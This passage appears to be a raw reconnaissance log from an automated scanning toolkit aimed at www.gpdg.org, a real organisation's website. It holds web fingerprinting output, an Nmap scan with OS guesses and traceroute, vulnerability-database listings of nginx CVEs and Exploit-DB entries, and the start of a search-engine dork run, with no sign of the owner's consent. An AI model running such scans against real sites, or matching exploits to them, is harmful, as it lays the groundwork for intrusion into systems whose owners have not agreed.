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
4388http://musecdn.businesscatalyst.com/scripts/4.0/jquery-1.8.3.min.js
4389https://webfonts.creativecloud.com/open-sans:n4,n3,i4:all.js
4390scripts/jquery-1.8.3.min.js?crc=209076791
4391scripts/require.js?crc=7928878
4392text/css
4393text/javascript
4394#######################################################################################################################################
4395http://www.gpdg.org [200 OK] Country[FRANCE][FR], HTML5, HTTPServer[nginx], IP[92.39.247.11], JQuery[1.8.3], MetaGenerator[2018.1.0.386], Plesk[Lin], Script[JavaScript>,text/javascript], Title[Bienvenue sur le portail du Grand Prieuré des Gaules - Ordre des Francs-Maçons Chrétiens de France], X-Powered-By[PleskLin], nginx
4396#######################################################################################################################################
4397
4398wig - WebApp Information Gatherer
4399
4400
4401Scanning http://www.gpdg.org...
4402_________________________________________ SITE INFO __________________________________________
4403IP Title
440492.39.247.11 Bienvenue sur le portail du Grand Prieuré des Gaules - Ordre des Francs-Maç
4405
4406__________________________________________ VERSION ___________________________________________
4407Name Versions Type
4408Apache 2.4.10 | 2.4.11 | 2.4.12 | 2.4.5 | 2.4.6 | 2.4.7 | 2.4.8 Platform
4409 2.4.9
4410nginx Platform
4411
4412______________________________________________________________________________________________
4413Time: 143.9 sec Urls: 820 Fingerprints: 40401
4414#######################################################################################################################################
4415Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 11:54 EST
4416NSE: Loaded 163 scripts for scanning.
4417NSE: Script Pre-scanning.
4418Initiating NSE at 11:54
4419Completed NSE at 11:54, 0.00s elapsed
4420Initiating NSE at 11:54
4421Completed NSE at 11:54, 0.00s elapsed
4422Initiating Parallel DNS resolution of 1 host. at 11:54
4423Completed Parallel DNS resolution of 1 host. at 11:54, 0.02s elapsed
4424Initiating SYN Stealth Scan at 11:54
4425Scanning www.gpdg.org (92.39.247.11) [1 port]
4426Discovered open port 80/tcp on 92.39.247.11
4427Completed SYN Stealth Scan at 11:54, 0.22s elapsed (1 total ports)
4428Initiating Service scan at 11:54
4429Scanning 1 service on www.gpdg.org (92.39.247.11)
4430Completed Service scan at 11:54, 6.37s elapsed (1 service on 1 host)
4431Initiating OS detection (try #1) against www.gpdg.org (92.39.247.11)
4432Retrying OS detection (try #2) against www.gpdg.org (92.39.247.11)
4433Initiating Traceroute at 11:54
4434Completed Traceroute at 11:54, 3.01s elapsed
4435Initiating Parallel DNS resolution of 13 hosts. at 11:54
4436Completed Parallel DNS resolution of 13 hosts. at 11:54, 0.32s elapsed
4437NSE: Script scanning 92.39.247.11.
4438Initiating NSE at 11:54
4439Completed NSE at 11:55, 53.13s elapsed
4440Initiating NSE at 11:55
4441Completed NSE at 11:55, 0.91s elapsed
4442Nmap scan report for www.gpdg.org (92.39.247.11)
4443Host is up (0.18s latency).
4444rDNS record for 92.39.247.11: vps2330-cloud.sd-france.net
4445
4446PORT STATE SERVICE VERSION
444780/tcp open http nginx
4448| http-brute:
4449|_ Path "/" does not require authentication
4450|_http-chrono: Request times for /; avg: 1529.91ms; min: 1326.95ms; max: 1768.33ms
4451|_http-csrf: Couldn't find any CSRF vulnerabilities.
4452|_http-date: Mon, 25 Nov 2019 16:54:51 GMT; 0s from local time.
4453|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
4454|_http-dombased-xss: Couldn't find any DOM based XSS.
4455|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
4456|_http-errors: Couldn't find any error pages.
4457|_http-feed: Couldn't find any feeds.
4458|_http-fetch: Please enter the complete path of the directory to save data in.
4459|_http-generator: 2018.1.0.386
4460| http-headers:
4461| Server: nginx
4462| Date: Mon, 25 Nov 2019 16:54:50 GMT
4463| Content-Type: text/html
4464| Content-Length: 42164
4465| Connection: close
4466| X-Accel-Version: 0.01
4467| Last-Modified: Sun, 12 May 2019 12:28:01 GMT
4468| ETag: "a4b4-588afee3a6f53"
4469| Accept-Ranges: bytes
4470| X-Powered-By: PleskLin
4471|
4472|_ (Request type: HEAD)
4473|_http-jsonp-detection: Couldn't find any JSONP endpoints.
4474| http-methods:
4475|_ Supported Methods: GET HEAD POST OPTIONS
4476|_http-mobileversion-checker: No mobile version detected.
4477| http-php-version: Logo query returned unknown hash c734c1504ee5de8975bfb8ad3d7593dc
4478|_Credits query returned unknown hash c734c1504ee5de8975bfb8ad3d7593dc
4479|_http-security-headers:
4480| http-sitemap-generator:
4481| Directory structure:
4482| /
4483| Other: 1
4484| /assets/
4485| mp4: 1; ogg: 1; webm: 1
4486| /css/
4487| css: 4
4488| /images/
4489| png: 2
4490| /scripts/
4491| js: 1
4492| Longest directory structure:
4493| Depth: 1
4494| Dir: /css/
4495| Total files found (by extension):
4496|_ Other: 1; css: 4; js: 1; mp4: 1; ogg: 1; png: 2; webm: 1
4497|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
4498|_http-title: Bienvenue sur le portail du Grand Prieur\xC3\xA9 des Gaules - Ordre ...
4499| http-vhosts:
4500|_127 names had status 200
4501|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
4502|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
4503|_http-xssed: No previously reported XSS vuln.
4504| vulscan: VulDB - https://vuldb.com:
4505| [133852] Sangfor Sundray WLAN Controller up to 3.7.4.2 Cookie Header nginx_webconsole.php Code Execution
4506| [132132] SoftNAS Cloud 4.2.0/4.2.1 Nginx privilege escalation
4507| [131858] Puppet Discovery up to 1.3.x Nginx Container weak authentication
4508| [130644] Nginx Unit up to 1.7.0 Router Process Request Heap-based memory corruption
4509| [127759] VeryNginx 0.3.3 Web Application Firewall privilege escalation
4510| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
4511| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
4512| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
4513| [119845] Pivotal Operations Manager up to 2.0.13/2.1.5 Nginx privilege escalation
4514| [114368] SuSE Portus 2.3 Nginx Certificate weak authentication
4515| [103517] nginx up to 1.13.2 Range Filter Request Integer Overflow memory corruption
4516| [89849] nginx RFC 3875 Namespace Conflict Environment Variable Open Redirect
4517| [87719] nginx up to 1.11.0 ngx_files.c ngx_chain_to_iovec denial of service
4518| [80760] nginx 0.6.18/1.9.9 DNS CNAME Record Crash denial of service
4519| [80759] nginx 0.6.18/1.9.9 DNS CNAME Record Use-After-Free denial of service
4520| [80758] nginx 0.6.18/1.9.9 DNS UDP Packet Crash denial of service
4521| [67677] nginx up to 1.7.3 SSL weak authentication
4522| [67296] nginx up to 1.7.3 SMTP Proxy ngx_mail_smtp_starttls privilege escalation
4523| [12822] nginx up to 1.5.11 SPDY SPDY Request Heap-based memory corruption
4524| [12824] nginx 1.5.10 on 32-bit SPDY memory corruption
4525| [11237] nginx up to 1.5.6 URI String Bypass privilege escalation
4526| [65364] nginx up to 1.1.13 Default Configuration information disclosure
4527| [8671] nginx up to 1.4 proxy_pass denial of service
4528| [8618] nginx 1.3.9/1.4.0 http/ngx_http_parse.c ngx_http_parse_chunked() memory corruption
4529| [7247] nginx 1.2.6 Proxy Function spoofing
4530| [61434] nginx 1.2.0/1.3.0 on Windows Access Restriction privilege escalation
4531| [5293] nginx up to 1.1.18 ngx_http_mp4_module MP4 File memory corruption
4532| [4843] nginx up to 1.0.13/1.1.16 HTTP Header Response Parser ngx_http_parse.c information disclosure
4533| [59645] nginx up to 0.8.9 Heap-based memory corruption
4534| [53592] nginx 0.8.36 memory corruption
4535| [53590] nginx up to 0.8.9 unknown vulnerability
4536| [51533] nginx 0.7.64 Terminal privilege escalation
4537| [50905] nginx up to 0.8.9 directory traversal
4538| [50903] nginx up to 0.8.10 NULL Pointer Dereference denial of service
4539| [50043] nginx up to 0.8.10 memory corruption
4540|
4541| MITRE CVE - https://cve.mitre.org:
4542| [CVE-2013-2070] http/modules/ngx_http_proxy_module.c in nginx 1.1.4 through 1.2.8 and 1.3.0 through 1.4.0, when proxy_pass is used with untrusted HTTP servers, allows remote attackers to cause a denial of service (crash) and obtain sensitive information from worker process memory via a crafted proxy response, a similar vulnerability to CVE-2013-2028.
4543| [CVE-2013-2028] The ngx_http_parse_chunked function in http/ngx_http_parse.c in nginx 1.3.9 through 1.4.0 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a chunked Transfer-Encoding request with a large chunk size, which triggers an integer signedness error and a stack-based buffer overflow.
4544| [CVE-2012-3380] Directory traversal vulnerability in naxsi-ui/nx_extract.py in the Naxsi module before 0.46-1 for Nginx allows local users to read arbitrary files via unspecified vectors.
4545| [CVE-2012-2089] Buffer overflow in ngx_http_mp4_module.c in the ngx_http_mp4_module module in nginx 1.0.7 through 1.0.14 and 1.1.3 through 1.1.18, when the mp4 directive is used, allows remote attackers to cause a denial of service (memory overwrite) or possibly execute arbitrary code via a crafted MP4 file.
4546| [CVE-2012-1180] Use-after-free vulnerability in nginx before 1.0.14 and 1.1.x before 1.1.17 allows remote HTTP servers to obtain sensitive information from process memory via a crafted backend response, in conjunction with a client request.
4547| [CVE-2011-4963] nginx/Windows 1.3.x before 1.3.1 and 1.2.x before 1.2.1 allows remote attackers to bypass intended access restrictions and access restricted files via (1) a trailing . (dot) or (2) certain "$index_allocation" sequences in a request.
4548| [CVE-2011-4315] Heap-based buffer overflow in compression-pointer processing in core/ngx_resolver.c in nginx before 1.0.10 allows remote resolvers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long response.
4549| [CVE-2010-2266] nginx 0.8.36 allows remote attackers to cause a denial of service (crash) via certain encoded directory traversal sequences that trigger memory corruption, as demonstrated using the "%c0.%c0." sequence.
4550| [CVE-2010-2263] nginx 0.8 before 0.8.40 and 0.7 before 0.7.66, when running on Windows, allows remote attackers to obtain source code or unparsed content of arbitrary files under the web document root by appending ::$DATA to the URI.
4551| [CVE-2009-4487] nginx 0.7.64 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator.
4552| [CVE-2009-3898] Directory traversal vulnerability in src/http/modules/ngx_http_dav_module.c in nginx (aka Engine X) before 0.7.63, and 0.8.x before 0.8.17, allows remote authenticated users to create or overwrite arbitrary files via a .. (dot dot) in the Destination HTTP header for the WebDAV (1) COPY or (2) MOVE method.
4553| [CVE-2009-3896] src/http/ngx_http_parse.c in nginx (aka Engine X) 0.1.0 through 0.4.14, 0.5.x before 0.5.38, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.14 allows remote attackers to cause a denial of service (NULL pointer dereference and worker process crash) via a long URI.
4554| [CVE-2009-2629] Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
4555|
4556| SecurityFocus - https://www.securityfocus.com/bid/:
4557| [99534] Nginx CVE-2017-7529 Remote Integer Overflow Vulnerability
4558| [93903] Nginx CVE-2016-1247 Remote Privilege Escalation Vulnerability
4559| [91819] Nginx CVE-2016-1000105 Security Bypass Vulnerability
4560| [90967] nginx CVE-2016-4450 Denial of Service Vulnerability
4561| [82230] nginx Multiple Denial of Service Vulnerabilities
4562| [78928] Nginx CVE-2010-2266 Denial-Of-Service Vulnerability
4563| [70025] nginx CVE-2014-3616 SSL Session Fixation Vulnerability
4564| [69111] nginx SMTP Proxy Remote Command Injection Vulnerability
4565| [67507] nginx SPDY Implementation CVE-2014-0088 Arbitrary Code Execution Vulnerability
4566| [66537] nginx SPDY Implementation Heap Based Buffer Overflow Vulnerability
4567| [63814] nginx CVE-2013-4547 URI Processing Security Bypass Vulnerability
4568| [59824] Nginx CVE-2013-2070 Remote Security Vulnerability
4569| [59699] nginx 'ngx_http_parse.c' Stack Buffer Overflow Vulnerability
4570| [59496] nginx 'ngx_http_close_connection()' Remote Integer Overflow Vulnerability
4571| [59323] nginx NULL-Byte Arbitrary Code Execution Vulnerability
4572| [58105] Nginx 'access.log' Insecure File Permissions Vulnerability
4573| [57139] nginx CVE-2011-4968 Man in The Middle Vulnerability
4574| [55920] nginx CVE-2011-4963 Security Bypass Vulnerability
4575| [54331] Nginx Naxsi Module 'nx_extract.py' Script Remote File Disclosure Vulnerability
4576| [52999] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
4577| [52578] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
4578| [50710] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
4579| [40760] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
4580| [40434] nginx Space String Remote Source Code Disclosure Vulnerability
4581| [40420] nginx Directory Traversal Vulnerability
4582| [37711] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
4583| [36839] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
4584| [36490] nginx WebDAV Multiple Directory Traversal Vulnerabilities
4585| [36438] nginx Proxy DNS Cache Domain Spoofing Vulnerability
4586| [36384] nginx HTTP Request Remote Buffer Overflow Vulnerability
4587|
4588| IBM X-Force - https://exchange.xforce.ibmcloud.com:
4589| [84623] Phusion Passenger gem for Ruby with nginx configuration insecure permissions
4590| [84172] nginx denial of service
4591| [84048] nginx buffer overflow
4592| [83923] nginx ngx_http_close_connection() integer overflow
4593| [83688] nginx null byte code execution
4594| [83103] Naxsi module for Nginx naxsi_unescape_uri() function security bypass
4595| [82319] nginx access.log information disclosure
4596| [80952] nginx SSL spoofing
4597| [77244] nginx and Microsoft Windows request security bypass
4598| [76778] Naxsi module for Nginx nx_extract.py directory traversal
4599| [74831] nginx ngx_http_mp4_module.c buffer overflow
4600| [74191] nginx ngx_cpystrn() information disclosure
4601| [74045] nginx header response information disclosure
4602| [71355] nginx ngx_resolver_copy() buffer overflow
4603| [59370] nginx characters denial of service
4604| [59369] nginx DATA source code disclosure
4605| [59047] nginx space source code disclosure
4606| [58966] nginx unspecified directory traversal
4607| [54025] nginx ngx_http_parse.c denial of service
4608| [53431] nginx WebDAV component directory traversal
4609| [53328] Nginx CRC-32 cached domain name spoofing
4610| [53250] Nginx ngx_http_parse_complex_uri() function code execution
4611|
4612| Exploit-DB - https://www.exploit-db.com:
4613| [26737] nginx 1.3.9/1.4.0 x86 Brute Force Remote Exploit
4614| [25775] Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow
4615| [25499] nginx 1.3.9-1.4.0 DoS PoC
4616| [24967] nginx 0.6.x Arbitrary Code Execution NullByte Injection
4617| [14830] nginx 0.6.38 - Heap Corruption Exploit
4618| [13822] Nginx <= 0.7.65 / 0.8.39 (dev) Source Disclosure / Download Vulnerability
4619| [13818] Nginx 0.8.36 Source Disclosure and DoS Vulnerabilities
4620| [12804] nginx [engine x] http server <= 0.6.36 Path Draversal
4621| [9901] nginx 0.7.0-0.7.61, 0.6.0-0.6.38, 0.5.0-0.5.37, 0.4.0-0.4.14 PoC
4622| [9829] nginx 0.7.61 WebDAV directory traversal
4623|
4624| OpenVAS (Nessus) - http://www.openvas.org:
4625| [864418] Fedora Update for nginx FEDORA-2012-3846
4626| [864310] Fedora Update for nginx FEDORA-2012-6238
4627| [864209] Fedora Update for nginx FEDORA-2012-6411
4628| [864204] Fedora Update for nginx FEDORA-2012-6371
4629| [864121] Fedora Update for nginx FEDORA-2012-4006
4630| [864115] Fedora Update for nginx FEDORA-2012-3991
4631| [864065] Fedora Update for nginx FEDORA-2011-16075
4632| [863654] Fedora Update for nginx FEDORA-2011-16110
4633| [861232] Fedora Update for nginx FEDORA-2007-1158
4634| [850180] SuSE Update for nginx openSUSE-SU-2012:0237-1 (nginx)
4635| [831680] Mandriva Update for nginx MDVSA-2012:043 (nginx)
4636| [802045] 64-bit Debian Linux Rootkit with nginx Doing iFrame Injection
4637| [801636] nginx HTTP Request Remote Buffer Overflow Vulnerability
4638| [103470] nginx 'ngx_http_mp4_module.c' Buffer Overflow Vulnerability
4639| [103469] nginx 'ngx_cpystrn()' Information Disclosure Vulnerability
4640| [103344] nginx DNS Resolver Remote Heap Buffer Overflow Vulnerability
4641| [100676] nginx Remote Source Code Disclosure and Denial of Service Vulnerabilities
4642| [100659] nginx Directory Traversal Vulnerability
4643| [100658] nginx Space String Remote Source Code Disclosure Vulnerability
4644| [100441] nginx Terminal Escape Sequence in Logs Command Injection Vulnerability
4645| [100321] nginx 'ngx_http_process_request_headers()' Remote Buffer Overflow Vulnerability
4646| [100277] nginx Proxy DNS Cache Domain Spoofing Vulnerability
4647| [100276] nginx HTTP Request Remote Buffer Overflow Vulnerability
4648| [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities
4649| [71574] Gentoo Security Advisory GLSA 201206-07 (nginx)
4650| [71308] Gentoo Security Advisory GLSA 201203-22 (nginx)
4651| [71297] FreeBSD Ports: nginx
4652| [71276] FreeBSD Ports: nginx
4653| [71239] Debian Security Advisory DSA 2434-1 (nginx)
4654| [66451] Fedora Core 11 FEDORA-2009-12782 (nginx)
4655| [66450] Fedora Core 10 FEDORA-2009-12775 (nginx)
4656| [66449] Fedora Core 12 FEDORA-2009-12750 (nginx)
4657| [64924] Gentoo Security Advisory GLSA 200909-18 (nginx)
4658| [64912] Fedora Core 10 FEDORA-2009-9652 (nginx)
4659| [64911] Fedora Core 11 FEDORA-2009-9630 (nginx)
4660| [64894] FreeBSD Ports: nginx
4661| [64869] Debian Security Advisory DSA 1884-1 (nginx)
4662|
4663| SecurityTracker - https://www.securitytracker.com:
4664| [1028544] nginx Bug Lets Remote Users Deny Service or Obtain Potentially Sensitive Information
4665| [1028519] nginx Stack Overflow Lets Remote Users Execute Arbitrary Code
4666| [1026924] nginx Buffer Overflow in ngx_http_mp4_module Lets Remote Users Execute Arbitrary Code
4667| [1026827] nginx HTTP Response Processing Lets Remote Users Obtain Portions of Memory Contents
4668|
4669| OSVDB - http://www.osvdb.org:
4670| [94864] cPnginx Plugin for cPanel nginx Configuration Manipulation Arbitrary File Access
4671| [93282] nginx proxy_pass Crafted Upstream Proxied Server Response Handling Worker Process Memory Disclosure
4672| [93037] nginx /http/ngx_http_parse.c Worker Process Crafted Request Handling Remote Overflow
4673| [92796] nginx ngx_http_close_connection Function Crafted r->
4674| [92634] nginx ngx_http_request.h zero_in_uri URL Null Byte Handling Remote Code Execution
4675| [90518] nginx Log Directory Permission Weakness Local Information Disclosure
4676| [88910] nginx Proxy Functionality SSL Certificate Validation MitM Spoofing Weakness
4677| [84339] nginx/Windows Multiple Request Sequence Parsing Arbitrary File Access
4678| [83617] Naxsi Module for Nginx naxsi-ui/ nx_extract.py Traversal Arbitrary File Access
4679| [81339] nginx ngx_http_mp4_module Module Atom MP4 File Handling Remote Overflow
4680| [80124] nginx HTTP Header Response Parsing Freed Memory Information Disclosure
4681| [77184] nginx ngx_resolver.c ngx_resolver_copy() Function DNS Response Parsing Remote Overflow
4682| [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access
4683| [65530] nginx Encoded Traversal Sequence Memory Corruption Remote DoS
4684| [65294] nginx on Windows Encoded Space Request Remote Source Disclosure
4685| [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass
4686| [62617] nginx Internal DNS Cache Poisoning Weakness
4687| [61779] nginx HTTP Request Escape Sequence Terminal Command Injection
4688| [59278] nginx src/http/ngx_http_parse.c ngx_http_process_request_headers() Function URL Handling NULL Dereference DoS
4689| [58328] nginx WebDAV Multiple Method Traversal Arbitrary File Write
4690| [58128] nginx ngx_http_parse_complex_uri() Function Underflow
4691| [44447] nginx (engine x) msie_refresh Directive Unspecified XSS
4692| [44446] nginx (engine x) ssl_verify_client Directive HTTP/0.9 Protocol Bypass
4693| [44445] nginx (engine x) ngx_http_realip_module satisfy_any Directive Unspecified Access Bypass
4694| [44444] nginx (engine x) X-Accel-Redirect Header Unspecified Traversal
4695| [44443] nginx (engine x) rtsig Method Signal Queue Overflow
4696| [44442] nginx (engine x) Worker Process Millisecond Timers Unspecified Overflow
4697|_
4698Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4699Device type: general purpose
4700Running (JUST GUESSING): Linux 3.X|4.X (90%)
4701OS CPE: cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel:4.0
4702Aggressive OS guesses: Linux 3.10 (90%), Linux 3.10 - 3.16 (90%), Linux 4.0 (90%), Linux 4.4 (89%), Linux 4.9 (89%), Linux 3.10 - 3.12 (87%)
4703No exact OS matches for host (test conditions non-ideal).
4704Uptime guess: 14.012 days (since Mon Nov 11 11:38:19 2019)
4705Network Distance: 14 hops
4706TCP Sequence Prediction: Difficulty=261 (Good luck!)
4707IP ID Sequence Generation: All zeros
4708
4709TRACEROUTE (using port 80/tcp)
4710HOP RTT ADDRESS
47111 131.28 ms 10.245.200.1
47122 ...
47133 132.90 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
47144 128.33 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
47155 132.99 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
47166 154.85 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
47177 160.26 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
47188 159.91 ms be2440.agr21.ams03.atlas.cogentco.com (130.117.50.6)
47199 159.68 ms tata.ams03.atlas.cogentco.com (130.117.15.102)
472010 171.73 ms if-ae-15-2.tcore1.pye-paris.as6453.net (195.219.194.146)
472111 169.19 ms te3-1.ew200-411-cr903.euroweb-network.com (80.231.154.50)
472212 176.53 ms 62.100.128.107
472313 180.41 ms 62.100.128.115
472414 185.65 ms vps2330-cloud.sd-france.net (92.39.247.11)
4725
4726NSE: Script Post-scanning.
4727Initiating NSE at 11:55
4728Completed NSE at 11:55, 0.00s elapsed
4729Initiating NSE at 11:55
4730Completed NSE at 11:55, 0.00s elapsed
4731#######################################################################################################################################
4732------------------------------------------------------------------------------------------------------------------------
4733
4734[ ! ] Starting SCANNER INURLBR 2.1 at [25-11-2019 11:56:01]
4735[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
4736It is the end user's responsibility to obey all applicable local, state and federal laws.
4737Developers assume no liability and are not responsible for any misuse or damage caused by this program
4738
4739[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/www.gpdg.org/output/inurlbr-www.gpdg.org ]
4740[ INFO ][ DORK ]::[ site:www.gpdg.org ]
4741[ INFO ][ SEARCHING ]:: {
4742[ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.bo ]
4743
4744[ INFO ][ SEARCHING ]::
4745-[:::]
4746[ INFO ][ ENGINE ]::[ GOOGLE API ]
4747
4748[ INFO ][ SEARCHING ]::
4749-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
4750[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.gi ID: 006748068166572874491:55ez0c3j3ey ]
4751
4752[ INFO ][ SEARCHING ]::
4753-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
4754
